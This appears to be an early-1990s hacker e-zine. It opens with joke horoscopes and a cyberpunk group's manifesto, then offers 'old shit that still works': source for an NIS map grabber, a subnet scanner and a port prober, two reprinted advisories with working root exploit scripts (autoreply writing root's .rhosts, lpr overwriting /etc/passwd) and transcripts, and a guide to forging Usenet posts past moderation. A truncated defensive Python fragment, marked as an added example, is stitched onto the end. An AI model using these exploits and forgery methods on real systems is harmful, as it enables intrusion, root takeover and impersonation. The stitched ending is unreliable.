There is a pot full of k0DeZ at the end of the rainbow for you. Try to channel all your ambition on finding it, hint: you won't find it in /bin/gif/kitchen.gear. Warning: Risk of bust between August 5th and August 10th!
Luck [oooo.] - Wealth [oo...] - Bust risk [ooo..] - Love [o....]

Taurus [April 20th - May 20th]

PhedZzZz are lurking behind Saturn, obscured behind one of the rings. Be sure to *67 all your calls, and you'll be fine. Hint: Don't undertake any interstellar space travel, and avoid big yellow ships. Watch out for SprintNet Security between July 12th and August 1st.
Luck [oo...] - Wealth [oo...] - Bust risk [oooo.] - Love [ooo..]

Gemini [May 21st - June 20th]

There might be a force dragging you into warez boards. Try to resist the attraction, or you might be thrown out of the paradise. Hint: If a stranger with a /ASL connect crosses your way, stay away from him. Warning: Your Dual Standard HST might explode sometime in June.
Luck [o....] - Wealth [ooo..] - Bust risk [o....] - Love [oo...]
Cancer [June 21st - July 22nd]

There are dark forces on your trail. Try to avoid all people wearing suits, don't get in their cars, and don't let them give you shit. Hint: Leave the country as soon as you can, or you won't be able to. Look out for U4EA on IRC in late July, you might get /killed.
Luck [o....] - Wealth [oo...] - Bust risk [ooooo] - Love [oo...]

Leo [July 23rd - August 22nd]

The path of Venus this year tells us that there is love on the way for you. Don't look for it on X-rated ftp sites, it might be out there somewhere. Hint: Try getting out of the house more frequently or you might miss it. Warning: If Monica Weaver comes across your way, break and run!
Luck [ooo..] - Wealth [o....] - Bust risk [oo...] - Love [oooo.]

Virgo [August 23rd - September 22nd]

Pluto tells us that you should stay away from VAXes in the near future. Lunatic force tells us that you might have more luck on Berkeley UNIX. Hint: Try to go beyond cat /etc/passwd. Explore sendmail bugs. Warning: In the first week of October, there is a risk of being ANIed.
Luck [oooo.] - Wealth [oo...] - Bust risk [oo...] - Love [o....]

Libra [September 23rd - October 22nd]

The closer way of Mars around the Sun this year might mean that you will be sued by a telco or a big corporation. The eclipse of Uranus could say that you might have some luck and card a VGA 486 Laptop. Hint: Be careful on the cordless. Watch out for good stuff in dumpsters between July 23rd and July 31st.
Luck [oo...] - Wealth [o....] - Bust risk [oooo.] - Love [oo...]

Scorpio [October 23rd - November 21st]

Sun propulsions say that you should spend more time exploring the innards of credit report systems, but be aware that Saturn reminds you that one local car dealer has his I.D. monitored. Hint: Stay out of #warez. Warning: A star called 43-141 might be your doom. Watch out.
Luck [ooo..] - Wealth [oooo.] - Bust risk [oo...] - Love [oo...]
Sagittarius [November 22nd - December 21st]

Cold storms on Pluto suggest that you don't try to play eleet anarchist on one of the upcoming cons. Pluto also sees that there might be a slight chance that you catch a bullet pestering a cop. Hint: Be nice to your relatives. You might get lucky BSing during the third week of August.
Luck [o....] - Wealth [oo...] - Bust risk [ooo..] - Love [oo...]

Capricorn [December 22nd - January 19th]

This summer brings luck to you. Everything you try is about to work out. You might find financial gain in selling k0DeZ to local warez bozos. Hint: Don't try to BS at a number that is a prime number, they will trace your ass and beat you to death with a raw cucumber. Special kick of luck between June 14th and July 2nd.
Luck [ooooo] - Wealth [oooo.] - Bust risk [oo...] - Love [ooo..]

Aquarius [January 20th - February 18th]

The third moon of Saturn suggests to stay in bed over the whole summer, or everything will worsen. Avoid going to any meetings and cons. Do not try to get up before September 11th. Hint: You can risk to call PRODIGY and have a gR3aT time. Warning: High chance of eavesdropping on your line on August 14th.
Luck [.....] - Wealth [o....] - Bust risk [ooooo] - Love [o....]

Pisces [February 19th - March 20th]

Mars reads a high mobility this summer. You should try to go to a foreign county, maybe visit HEU II. Finances will be OK. Do not go on any buses for that might be your doom. Hint: Don't get a seat near a window, whatever you do. Warning: Avoid 6'8" black guys in Holland, they might go for your ass.
Luck [ooo..] - Wealth [ooo..] - Bust risk [o....] - Love [oo...]

If your horoscope does not come true, complain to god@heaven.mil.       31337
If it does, you are welcome to report it to onkeld@ponton.hanse.de.
43V3R ------------------------------------------------------------------------------ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: The SenseReal Mission If you are reading this it indicates you have reached a point along your journey that you will have to decide whether you agree with The SenseReal Foundation or whether you think that those who believe and support The SenseReal Foundation are crazy. Your decision to join The SenseReal Foundation on it's mission will undoubtedly change your life forever. When you understand the reason it exists and what it seeks you will better know how to decide. That is why this text was created. He is known as Green Ghost. Some know him as Jim Nightshade. He was born in 1966. He is not a baby boomer and he is not a Generation Xer. He falls into that group of the population that has so far escaped definition. He is a (yberpunk. He was (yberpunk before (yberpunk was cool. He is the founder and leader of The SenseReal Foundation. You will learn more about him later. But first you will have to know about the background. There once was a man named Albert Hoffman. In 1943, on April 16 Hoffman absorbed a threshold amount of the drug known as LSD. He experienced "a peculiar restlessness". LSD since that time has played an important role in this world. There are other agents involved in the story. Mary Pinchot, JFK, Nixon, Charles Manson, Jimi Hendrix, Timothy Leary, Elvis Presley and many others. There are too many details and explanations necessary to explain everything here. But this does not matter. Because the SenseReal Foundation is about riding the wave. We believe that the ultimate goal cannot be defined. To define it would be to destroy it. The SenseReal Foundation hopes that things can be changed for the better. But we realize that the situation can become much worse. 
From what history teaches us and what we instinctively feel, we know that there is a great probability that things will get much worse before and if things ever get better. Doom looms on the horizon like an old friend. Freedom is being threatened every day and The SenseReal Foundation seeks to defend and seek Freedom. Big Brother is here NOW and to deny his existence is only to play into his hand. The goal of our government both here in America and worldwide is to remain in power and increase it's control of The People. To expose Big Brother and destroy him is one of the many goals of The SenseReal Foundation. As a member of (yberspace and an agent of The SenseReal Foundation you will have to carefully consider your interaction with the flow of Info. The ideals of Liberty must be maintained. The SenseReal Foundation provides a grounding point. The place where the spark transfers from plasma to light and back to plasma. Tesla was not on the wrong track. The SenseReal Foundation is a mechanism which seeks to increase Freedom. Only by learning more can we defeat the Evil. The Good must prevail. If you have the Hacker spirit and think along the same lines then The SenseReal Foundation may be your calling. If you think like J.R. Dobbs or Green Ghost then it is possible we can make it through The Apocalypse. A final date has never been announced for this event. Green Ghost does not claim to know the exact date but he does claim to have some Info on it. Green Ghost does not claim to have all the answers or even to know all the questions. He was first exposed to computers in the early 70's at his local high school. The first computer he ever used was a Honeywell terminal connected to a mainframe operated at the home office of Honeywell and operated for the school. This machine was programed by feeding it stacks of cards with boxes X'd out with a No. 2 pencil. It did have a keyboard hooked up to a printer which served for the monitor. 
The text was typed out and the paper rolled out of the machine in great waves. This experience left him wanting more. Somewhere between the machine and the mind were all the questions and all the answers. The SenseReal Foundation will supply some of the means. We must all work together if we are to succeed. UNITED WE STAND, DIVIDED WE FALL. If you wish to participate with The SenseReal Foundation you must devote yourself to becoming an Info Agent. As an Info Agent it is your duty to seek Truth and Knowledge out wherever it is located. To Learn and to seek to increase the Learning of all at The SenseReal Foundation. Different people will be needed to help out in different ways. SenseReal's Info Agents are located all around the world and are in contact with fellow SenseReal members via any one of several SenseReal facilities. The primary establishment and headquarters of The SenseReal Foundation is SenseReal's own online system: T /-/ E /-/ /=\ ( /< E R ' S /\/\ /=\ /\/ S / O /\/ >>>::: 1 - 8 0 3 - 7 8 5 - 5 0 8 0 :::<<< 27 Hours Per Day /14.4 Supra /Home of The SenseReal Foundation Also contact via SenseReal's mail drop by writing or sending materials to: TSF \ Electronic Mail: P.O. BOX 6914 \ Green_Ghost@neonate.atl.ga.us HILTON HEAD, SC 29938-6914 \ The Hacker's /\/\ansion is a system like no other. While it is not your typical Hackers board it has much Info on Hacking. While it is not like any Adult system you've ever seen it has the most finest Adult material available anywhere. It is not a Warez board but we are definitely Pirates. Because we are (yberpunks. What makes the Hacker's Mansion different is our emphasis on quality. Everything that you find at The /-/acker's /\/\ansion is 1ST (lass. All the coolest E-zines are pursued here. Phrack, CUD, and Thought Virus to name just a few. 
Of course there is one other source for Thought Virus: Send E-Mail to: ListServ@neonate.atl.ga.us In the subject or body of the message write: FAQ ThoughtCriminals and you will receive the current issue in your E-Mail box in no time. If you wish to join the Thought Criminals mailing list and communicate with your fellow Thought Criminals via E-Mail then send another message to: ListServ@neonate.atl.ga.us and write the following in the subject or body of the message: Subscribe ThoughtCriminals Your-Address-Here or simply: Subscribe ThoughtCriminals To mail others on the Thought Criminals mailing list send a message to: ThoughtCriminals@neonate.atl.ga.us Tell us all. Communication is vital. Our survival may depend on it. The SenseReal Foundation is about the allegiance of many people, and indeed beings, as our friends from other planets can tell you. The EFF inspired us and was a model but we don't have the EFF's money so we need YOU. If you are someone who can contribute or who believes in The Cause or are just interested in Tax Resistance or the Free The Weed movement then you should join The SenseReal Foundation today. Contact us through any of above channels and become a Freedom Fighter today. Time is of the essence. :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ------------------------------------------------------------------------------ ** OLD SHIT THAT STILL WORKS ** - sometimes - /* * THIS PROGRAM EXERCISES SECURITY HOLES THAT, WHILE GENERALLY KNOWN IN * THE UNIX SECURITY COMMUNITY, ARE NEVERTHELESS STILL SENSITIVE SINCE * IT REQUIRES SOME BRAINS TO TAKE ADVANTAGE OF THEM. PLEASE DO NOT * REDISTRIBUTE THIS PROGRAM TO ANYONE YOU DO NOT TRUST COMPLETELY. * * ypsnarf - exercise security holes in yp/nis. * * Based on code from Dan Farmer (zen@death.corp.sun.com) and Casper Dik * (casper@fwi.uva.nl). 
* * Usage: * ypsnarf server client * - to obtain the yp domain name * ypsnarf server domain mapname * - to obtain a copy of a yp map * ypsnarf server domain maplist * - to obtain a list of yp maps * * In the first case, we lie and pretend to be the host "client", and send * a BOOTPARAMPROC_WHOAMI request to the host "server". Note that for this * to work, "server" must be running rpc.bootparamd, and "client" must be a * diskless client of (well, it must boot from) "server". * * In the second case, we send a YPPROC_DOMAIN request to the host "server", * asking if it serves domain "domain". If so, we send YPPROC_FIRST and * YPPROC_NEXT requests (just like "ypcat") to obtain a copy of the yp map * "mapname". Note that you must specify the full yp map name, you cannot * use the shorthand names provided by "ypcat". * * In the third case, the special map name "maplist" tells ypsnarf to send * a YPPROC_MAPLIST request to the server and get the list of maps in domain * "domain", instead of getting the contents of a map. If the server has a * map called "maplist" you can't get it. Oh well. * * Since the callrpc() routine does not make any provision for timeouts, we * artificially impose a timeout of YPSNARF_TIMEOUT1 seconds during the * initial requests, and YPSNARF_TIMEOUT2 seconds during a map transfer. * * This program uses UDP packets, which means there's a chance that things * will get dropped on the floor; it's not a reliable stream like TCP. In * practice though, this doesn't seem to be a problem. * * To compile: * cc -o ypsnarf ypsnarf.c -lrpcsvc * * David A. 
Curry * Purdue University * Engineering Computer Network * Electrical Engineering Building * West Lafayette, IN 47907 * davy@ecn.purdue.edu * January, 1991 */ #include #include #include #include #include #include #include #include #include #include #include #include #include #define BOOTPARAM_MAXDOMAINLEN 32 /* from rpc.bootparamd */ #define YPSNARF_TIMEOUT1 15 /* timeout for initial request */ #define YPSNARF_TIMEOUT2 30 /* timeout during map transfer */ char *pname; /* program name */ main(argc, argv) char **argv; int argc; { char *server, *client, *domain, *mapname; pname = *argv; /* * Process arguments. This is less than robust, but then * hey, you're supposed to know what you're doing. */ switch (argc) { case 3: server = *++argv; client = *++argv; get_yp_domain(server, client); exit(0); case 4: server = *++argv; domain = *++argv; mapname = *++argv; if (strcmp(mapname, "maplist") == 0) get_yp_maplist(server, domain); else get_yp_map(server, domain, mapname); exit(0); default: fprintf(stderr, "Usage: %s server client -", pname); fprintf(stderr, "to obtain yp domain name\n"); fprintf(stderr, " %s server domain mapname -", pname); fprintf(stderr, "to obtain contents of yp map\n"); exit(1); } } /* * get_yp_domain - figure out the yp domain used between server and client. */ get_yp_domain(server, client) char *server, *client; { long hostip; struct hostent *hp; bp_whoami_arg w_arg; bp_whoami_res w_res; extern void timeout(); enum clnt_stat errcode; /* * Just a sanity check, here. */ if ((hp = gethostbyname(server)) == NULL) { fprintf(stderr, "%s: %s: unknown host.\n", pname, server); exit(1); } /* * Allow the client to be either an internet address or a * host name. Copy in the internet address. 
*/ if ((hostip = inet_addr(client)) == -1) { if ((hp = gethostbyname(client)) == NULL) { fprintf(stderr, "%s: %s: unknown host.\n", pname, client); exit(1); } bcopy(hp->h_addr_list[0], (caddr_t) &w_arg.client_address.bp_address.ip_addr, hp->h_length); } else { bcopy((caddr_t) &hostip, (caddr_t) &w_arg.client_address.bp_address.ip_addr, sizeof(ip_addr_t)); } w_arg.client_address.address_type = IP_ADDR_TYPE; bzero((caddr_t) &w_res, sizeof(bp_whoami_res)); /* * Send a BOOTPARAMPROC_WHOAMI request to the server. This will * give us the yp domain in the response, IFF client boots from * the server. */ signal(SIGALRM, timeout); alarm(YPSNARF_TIMEOUT1); errcode = callrpc(server, BOOTPARAMPROG, BOOTPARAMVERS, BOOTPARAMPROC_WHOAMI, xdr_bp_whoami_arg, &w_arg, xdr_bp_whoami_res, &w_res); alarm(0); if (errcode != RPC_SUCCESS) print_rpc_err(errcode); /* * Print the domain name. */ printf("%.*s", BOOTPARAM_MAXDOMAINLEN, w_res.domain_name); /* * The maximum domain name length is 255 characters, but the * rpc.bootparamd program truncates anything over 32 chars. */ if (strlen(w_res.domain_name) >= BOOTPARAM_MAXDOMAINLEN) printf(" (truncated?)"); /* * Put out the client name, if they didn't know it. */ if (hostip != -1) printf(" (client name = %s)", w_res.client_name); putchar('\n'); } /* * get_yp_map - get the yp map "mapname" from yp domain "domain" from server. */ get_yp_map(server, domain, mapname) char *server, *domain, *mapname; { char *reqp; bool_t yesno; u_long calltype; bool (*xdr_proc)(); extern void timeout(); enum clnt_stat errcode; struct ypreq_key keyreq; struct ypreq_nokey nokeyreq; struct ypresp_key_val answer; /* * This code isn't needed; the next call will give the same * error message if there's no yp server there. */ #ifdef not_necessary /* * "Ping" the yp server and see if it's there. 
*/ signal(SIGALRM, timeout); alarm(YPSNARF_TIMEOUT1); errcode = callrpc(host, YPPROG, YPVERS, YPPROC_NULL, xdr_void, 0, xdr_void, 0); alarm(0); if (errcode != RPC_SUCCESS) print_rpc_err(errcode); #endif /* * Figure out whether server serves the yp domain we want. */ signal(SIGALRM, timeout); alarm(YPSNARF_TIMEOUT1); errcode = callrpc(server, YPPROG, YPVERS, YPPROC_DOMAIN, xdr_wrapstring, (caddr_t) &domain, xdr_bool, (caddr_t) &yesno); alarm(0); if (errcode != RPC_SUCCESS) print_rpc_err(errcode); /* * Nope... */ if (yesno == FALSE) { fprintf(stderr, "%s: %s does not serve domain %s.\n", pname, server, domain); exit(1); } /* * Now we just read entry after entry... The first entry we * get with a nokey request. */ keyreq.domain = nokeyreq.domain = domain; keyreq.map = nokeyreq.map = mapname; reqp = (caddr_t) &nokeyreq; keyreq.keydat.dptr = NULL; answer.status = TRUE; calltype = YPPROC_FIRST; xdr_proc = xdr_ypreq_nokey; while (answer.status == TRUE) { bzero((caddr_t) &answer, sizeof(struct ypresp_key_val)); signal(SIGALRM, timeout); alarm(YPSNARF_TIMEOUT2); errcode = callrpc(server, YPPROG, YPVERS, calltype, xdr_proc, reqp, xdr_ypresp_key_val, &answer); alarm(0); if (errcode != RPC_SUCCESS) print_rpc_err(errcode); /* * Got something; print it. */ if (answer.status == TRUE) { printf("%.*s\n", answer.valdat.dsize, answer.valdat.dptr); } /* * Now we're requesting the next item, so have to * send back the current key. */ calltype = YPPROC_NEXT; reqp = (caddr_t) &keyreq; xdr_proc = xdr_ypreq_key; if (keyreq.keydat.dptr) free(keyreq.keydat.dptr); keyreq.keydat = answer.keydat; if (answer.valdat.dptr) free(answer.valdat.dptr); } } /* * get_yp_maplist - get the yp map list for yp domain "domain" from server. 
*/ get_yp_maplist(server, domain) char *server, *domain; { bool_t yesno; extern void timeout(); struct ypmaplist *mpl; enum clnt_stat errcode; struct ypresp_maplist maplist; /* * This code isn't needed; the next call will give the same * error message if there's no yp server there. */ #ifdef not_necessary /* * "Ping" the yp server and see if it's there. */ signal(SIGALRM, timeout); alarm(YPSNARF_TIMEOUT1); errcode = callrpc(host, YPPROG, YPVERS, YPPROC_NULL, xdr_void, 0, xdr_void, 0); alarm(0); if (errcode != RPC_SUCCESS) print_rpc_err(errcode); #endif /* * Figure out whether server serves the yp domain we want. */ signal(SIGALRM, timeout); alarm(YPSNARF_TIMEOUT1); errcode = callrpc(server, YPPROG, YPVERS, YPPROC_DOMAIN, xdr_wrapstring, (caddr_t) &domain, xdr_bool, (caddr_t) &yesno); alarm(0); if (errcode != RPC_SUCCESS) print_rpc_err(errcode); /* * Nope... */ if (yesno == FALSE) { fprintf(stderr, "%s: %s does not serve domain %s.\n", pname, server, domain); exit(1); } maplist.list = (struct ypmaplist *) NULL; /* * Now ask for the list. */ signal(SIGALRM, timeout); alarm(YPSNARF_TIMEOUT1); errcode = callrpc(server, YPPROG, YPVERS, YPPROC_MAPLIST, xdr_wrapstring, (caddr_t) &domain, xdr_ypresp_maplist, &maplist); alarm(0); if (errcode != RPC_SUCCESS) print_rpc_err(errcode); if (maplist.status != YP_TRUE) { fprintf(stderr, "%s: cannot get map list: %s\n", pname, yperr_string(ypprot_err(maplist.status))); exit(1); } /* * Print out the list. */ for (mpl = maplist.list; mpl != NULL; mpl = mpl->ypml_next) printf("%s\n", mpl->ypml_name); } /* * print_rpc_err - print an rpc error and exit. */ print_rpc_err(errcode) enum clnt_stat errcode; { fprintf(stderr, "%s: %s\n", pname, clnt_sperrno(errcode)); exit(1); } /* * timeout - print a timeout and exit. 
*/ void timeout() { fprintf(stderr, "%s: RPC request (callrpc) timed out.\n", pname); exit(1); } ------------------------------------------------------------------------------ #!/bin/perl -s # # Scan a subnet for valid hosts; if given hostname, will look at the # 255 possible hosts on that net. Report if host is running rexd or # ypserv. # # Usage: scan n.n.n.n # mine, by default $default = "130.80.26"; $| = 1; if ($v) { $verbose = 1; } if ($#ARGV == -1) { $root = $default; } else { $root = $ARGV[0]; } # ip address if ($root !~ /[0-9]+\.[0-9]+\.[0-9]+/) { ($na, $ad, $ty, $le, @host_ip) = gethostbyname($root); ($one,$two,$three,$four) = unpack('C4',$host_ip[0]); $root = "$one.$two.$three"; if ($root eq "..") { die "Can't figure out what to scan...\n"; } } print "Subnet $root:\n" if $verbose; for $i (01..255) { print "Trying $root.$i\t=> " if $verbose; &resolve("$root.$i"); } # # Do the work # sub resolve { local($name) = @_; # ip address if ($name =~ /[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/) { ($a,$b,$c,$d) = split(/\./, $name); @ip = ($a,$b,$c,$d); ($name) = gethostbyaddr(pack("C4", @ip), &AF_INET); } else { ($name, $aliases, $type, $len, @ip) = gethostbyname($name); ($a,$b,$c,$d) = unpack('C4',$ip[0]); } if ($name && @ip) { print "$a.$b.$c.$d\t$name\n"; system("if ping $name 5 > /dev/null ; then\nif rpcinfo -u $name 100005 > /dev/null ; then showmount -e $name\nfi\nif rpcinfo -t $name 100017 > /dev/null ; then echo \"Running rexd.\"\nfi\nif rpcinfo -u $name 100004 > /dev/null ; then echo \"R unning ypserv.\"\nfi\nfi"); } else { print "unable to resolve address\n" if $verbose; } } sub AF_INET {2;} ------------------------------------------------------------------------------ /* * probe_tcp_ports */ #include #include #include #include #include #include #include #define RETURN_ERR -1 #define RETURN_FAIL 0 #define RETURN_SUCCESS 1 int Debug; int Hack; int Verbose; main(ArgC, ArgV) int ArgC; char **ArgV; { int Index; int SubIndex; for (Index = 1; (Index < ArgC) && 
(ArgV[Index][0] == '-'); Index++) for (SubIndex = 1; ArgV[Index][SubIndex]; SubIndex++) switch (ArgV[Index][SubIndex]) { case 'd': Debug++; break; case 'h': Hack++; break; case 'v': Verbose++; break; default: (void) fprintf(stderr, "Usage: probe_tcp_ports [-dhv] [hostname [hostname ...] ]\n"); exit(1); } for (; Index < ArgC; Index++) (void) Probe_TCP_Ports(ArgV[Index]); exit(0); } Probe_TCP_Ports(Name) char *Name; { unsigned Port; char *Host; struct hostent *HostEntryPointer; struct sockaddr_in SocketInetAddr; struct hostent TargetHost; struct in_addr TargetHostAddr; char *AddressList[1]; char NameBuffer[128]; extern int inet_addr(); extern char *rindex(); if (Name == NULL) return (RETURN_FAIL); Host = Name; if (Host == NULL) return (RETURN_FAIL); HostEntryPointer = gethostbyname(Host); if (HostEntryPointer == NULL) { TargetHostAddr.s_addr = inet_addr(Host); if (TargetHostAddr.s_addr == -1) { (void) printf("unknown host: %s\n", Host); return (RETURN_FAIL); } (void) strcpy(NameBuffer, Host); TargetHost.h_name = NameBuffer; TargetHost.h_addr_list = AddressList, TargetHost.h_addr = (char *) &TargetHostAddr; TargetHost.h_length = sizeof(struct in_addr); TargetHost.h_addrtype = AF_INET; TargetHost.h_aliases = 0; HostEntryPointer = &TargetHost; } SocketInetAddr.sin_family = HostEntryPointer->h_addrtype; bcopy(HostEntryPointer->h_addr, (char *) &SocketInetAddr.sin_addr, HostEntryPointer->h_length); for (Port = 1; Port < 65536; Port++) (void) Probe_TCP_Port(Port, HostEntryPointer, SocketInetAddr); return (RETURN_SUCCESS); } Probe_TCP_Port(Port, HostEntryPointer, SocketInetAddr) unsigned Port; struct hostent *HostEntryPointer; struct sockaddr_in SocketInetAddr; { char Buffer[BUFSIZ]; int SocketDescriptor; struct servent *ServiceEntryPointer; SocketInetAddr.sin_port = Port; SocketDescriptor = socket(AF_INET, SOCK_STREAM, 6); if (SocketDescriptor < 0) { perror("socket"); return (RETURN_ERR); } if (Verbose) { (void) printf("Host %s, Port %d ", HostEntryPointer->h_name, Port); 
if ((ServiceEntryPointer = getservbyport(Port, "tcp")) != (struct servent *) NULL) (void) printf(" (\"%s\" service) ", ServiceEntryPointer->s_name); (void) printf("connection ... "); (void) fflush(stdout); } if (connect(SocketDescriptor, (char *) &SocketInetAddr, sizeof(SocketInetAddr)) < 0) { if (Verbose) (void) printf("NOT open.\n"); if (Debug) perror("connect"); } else { if (!Verbose) { (void) printf("Host %s, Port %d ", HostEntryPointer->h_name, Port); if ((ServiceEntryPointer = getservbyport(Port,"tcp")) != (struct servent *) NULL) (void) printf(" (\"%s\" service) ", ServiceEntryPointer->s_name); (void) printf("connection ... "); (void) fflush(stdout); } (void) printf("open.\n"); if (Hack) { (void) sprintf(Buffer, "/usr/ucb/telnet %s %d", HostEntryPointer->h_name, Port); (void) system(Buffer); } } (void) close(SocketDescriptor); return (RETURN_SUCCESS); }

------------------------------------------------------------------------------

[8lgm]-Advisory-2.UNIX.autoreply.12-Jul-1991

PROGRAM:

        autoreply(1)            (/usr/local/bin/autoreply)
        Supplied with the Elm Mail System

VULNERABLE OS's:

        Any system with a standard installation of The Elm Mail System.
        All versions are believed to have this vulnerability.

DESCRIPTION:

        autoreply(1) can be used to create root owned files, with mode
        666.  It can also overwrite any file with semi user-controlled
        data.

IMPACT:

        Any user with access to autoreply(1) can alter system files and
        thus become root.

REPEAT BY:

        This example demonstrates how to become root on most affected
        machines by modifying root's .rhosts file.  Please do not do
        this unless you have permission.
        Create the following script, 'fixrhosts':

8<--------------------------- cut here ----------------------------
#!/bin/sh
#
# fixrhosts rhosts-file user machine
#
if [ $# -ne 3 ]; then
        echo "Usage: `basename $0` rhosts-file user machine"
        exit 1
fi
RHOSTS="$1"
USERNAME="$2"
MACHINE="$3"
cd $HOME
echo x > "a $MACHINE $USERNAME b"
umask 022
autoreply "a $MACHINE $USERNAME b"
cat > /tmp/.rhosts.sh.$$ << 'EOF'
ln -s $1 `echo $$ | awk '{printf "/tmp/arep.%06d", $1}'`
exec autoreply off
exit 0
EOF
/bin/sh /tmp/.rhosts.sh.$$ $RHOSTS
rm -f /tmp/.rhosts.sh.$$ "a $MACHINE $USERNAME b"
exit 0
8<--------------------------- cut here ----------------------------

        (Lines marked with > represent user input)

> % id
  uid=97(8lgm) gid=97(8lgm) groups=97(8lgm)
> % ./fixrhosts ~root/.rhosts 8lgm localhost
  You've been added to the autoreply system.
  You've been removed from the autoreply table.
> % rsh localhost -l root csh -i
  Warning: no access to tty.
  Thus no job control in this shell.
  #

FIX:

        1. Disable autoreply.
        2. Wait for a patch from the Elm maintainers.

------------------------------------------------------------------------------

[8lgm]-Advisory-3.UNIX.lpr.19-Aug-1991

PROGRAM:

        lpr(1)          (/usr/ucb/lpr or /usr/bin/lpr)

VULNERABLE OS's:

        SunOS 4.1.1 or earlier
        BSD 4.3
        BSD NET/2 Derived Systems
        A/UX 2.0.1
        Most systems supporting the BSD LP subsystem

DESCRIPTION:

        lpr(1) can be used to overwrite or create (and become owner of)
        any file on the system.  lpr -s allows users to create symbolic
        links in lpd's spool directory (typically /var/spool/lpd).
        After 1000 invocations of lpr, lpr will reuse the filename in
        the spool directory, and follow the link previously installed.
        It will thus overwrite/create any file that this link points to.

IMPACT:

        Any user with access to lpr(1) can alter system files and thus
        become root.

REPEAT BY:

        This example demonstrates how to become root on most affected
        machines by modifying /etc/passwd and /etc/group.  Please do
        not do this unless you have permission.
        Create the following script, 'lprcp':

8<--------------------------- cut here ----------------------------
#!/bin/csh -f
#
# Usage: lprcp from-file to-file
#

if ($#argv != 2) then
        echo Usage: lprcp from-file to-file
        exit 1
endif

# This link stuff allows us to overwrite unreadable files,
# should we want to.
echo x > /tmp/.tmp.$$
lpr -q -s /tmp/.tmp.$$
rm -f /tmp/.tmp.$$              # lpr's accepted it, point it
ln -s $2 /tmp/.tmp.$$           # to where we really want

@ s = 0
while ( $s != 999)              # loop 999 times
        lpr /nofile >&/dev/null # doesn't exist, but spins the clock!
        @ s++
        if ( $s % 10 == 0 ) echo -n .
end
lpr $1                          # incoming file
                                # user becomes owner
rm -f /tmp/.tmp.$$
exit 0
8<--------------------------- cut here ----------------------------

        (Lines marked with > represent user input)

Make copies of /etc/passwd and /etc/group, and modify them:

> % id
  uid=97(8lgm) gid=97(8lgm) groups=97(8lgm)
> % cp /etc/passwd /tmp/passwd
> % ex /tmp/passwd
  /tmp/passwd: unmodified: line 42
> :a
> 8lgmroot::0:0:Test account for lpr bug:/:/bin/csh
> .
> :wq
  /tmp/passwd: 43 lines, 2188 characters.
> % cp /etc/group /tmp
> % ex /tmp/group
  /tmp/group: unmodified: line 49
> :/wheel
  wheel:*:0:root,operator
> :c
> wheel:*:0:root,operator,8lgm
> .
> :wq
  /tmp/group: 49 lines, 944 characters.

Install our new files:

> % ./lprcp /tmp/group /etc/group
  ................................................................
  ...................................
  lpr: cannot rename /var/spool/lpd/cfA060testnode
> % ./lprcp /tmp/passwd /etc/passwd
  .................................................................
  ..................................
  lpr: cannot rename /var/spool/lpd/cfA061testnode

Check it worked:

> % ls -l /etc/passwd /etc/group
  -rw-r--r-- 1 8lgm 944 Mar 3 19:56 /etc/group
  -rw-r--r-- 1 8lgm 2188 Mar 3 19:59 /etc/passwd
> % head -1 /etc/group
  wheel:*:0:root,operator,8lgm
> % grep '^8lgmroot' /etc/passwd
  8lgmroot::0:0:Test account for lpr bug:/:/bin/csh

Become root and tidy up:

> % su 8lgmroot
  # chown root /etc/passwd /etc/group
  # rm -f /tmp/passwd /tmp/group
  #

FIX:

        1. Contact your vendor for a fix.
        2. In the meantime, apply the following patch, derived from
           BSD NET/2 source, which will correct the flaw on most
           affected systems:

------------------------------------------------------------------------------

Anonymous netnews without "anonymous" remailers

Save any news article to a file. We'll call it "hak" in this example.

Edit hak, and remove any header lines of the form

        From some!random!path!user      (note: "From ", not "From: " !!)
        Article:
        Lines:

Shorten the Path: header down to its LAST two or three "bangized"
components. This is to make the article look like it was posted from where
it really was posted, and originally hit the net at or near the host you
send it to. Or you can construct a completely new Path: line to reflect
your assumed alias.

Make some change to the Message-ID: field, that isn't likely to be
duplicated anywhere. This is usually best done by adding a couple of random
characters to the part before the @, since news posting programs generally
use a fixed-length field to generate these IDs.

Change the other headers to say what you like -- From:, Newsgroups:,
Sender:, etc. Replace the original message text with your message. If you
are posting to a moderated group, remember to put in an Approved: header to
bypass the moderation mechanism.

Write out the changed file, and send it to your favorite NNTP server that
permits transfers via the IHAVE command, using the following script:

=======================
#! /bin/sh
## Post an article via IHAVE.
## args: filename server

if test "$2" = "" ; then
  echo usage: $0 filename server
  exit 1
fi
if test ! -f $1 ; then
  echo $1: not found
  exit 1
fi

# suck msg-id out of headers, keep the brackets
msgid=`sed -e '/^$/,$d' $1 | egrep '^[Mm]essage-[Ii][Dd]: ' | \
  sed 's/.*-[Ii][Dd]: //'`
echo $msgid

( sleep 5
  echo IHAVE $msgid
  sleep 3
  cat $1
  sleep 1
  echo "."
  sleep 1
  echo QUIT ) | telnet $2 119
=======================

If your article doesn't appear in a day or two, try a different server.
They are easy to find. Here's a script that will break a large file full of
saved netnews into a list of hosts to try. Edit the output of this if you
want, to remove obvious people's names and other trash.

=======================
#! /bin/sh
FGV='fgrep -i -v'
egrep '^Path: ' $1 | sed -e 's/^Path: //' -e 's/!/\
/g' | sort -u | fgrep . | $FGV .bitnet | $FGV .uucp
=======================

Once you have your host list, feed it to the following script.

=======================
#! /bin/sh

while read xx ; do
if test "$xx" = "" ; then continue;
fi
echo === $xx
( echo open $xx 119
  sleep 5
  echo ihave k00l@x.edu
  sleep 4
  echo .
  echo quit
  sleep 1
  echo quit
) | telnet
done
=======================

If the above script is called "findem" and you're using csh, you should do

        findem < list >& outfile

so that ALL output from telnet is captured. This takes a long time, but when
it finishes, edit "outfile" and look for occurrences of "335". These mark
answers from servers that might be willing to accept an article. This isn't
a completely reliable indication, since some servers respond with acceptance
and later drop articles. Try a given server with a slightly modified repeat
of someone else's message, and see if it eventually appears.

You will notice other servers that don't necessarily take an IHAVE, but say
"posting ok". You can probably do regular POSTS through these, but they will
add an "NNTP-Posting-Host: " header containing the machine YOU came from.
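Seen from the server side, the procedure above works only where IHAVE is answered for arbitrary hosts and the transferred headers are taken at face value. The following is an added example, not part of the original article: a sketch of the checks a news server can make at the IHAVE offer and after the transfer. The peer table, moderator list, host names and sample articles are constructed assumptions; the response codes are those of RFC 977.

```python
from email.parser import HeaderParser
from email.utils import parseaddr

# Constructed configuration (assumptions, not taken from the article):
# hosts allowed to feed us, mapped to the name each one puts in Path,
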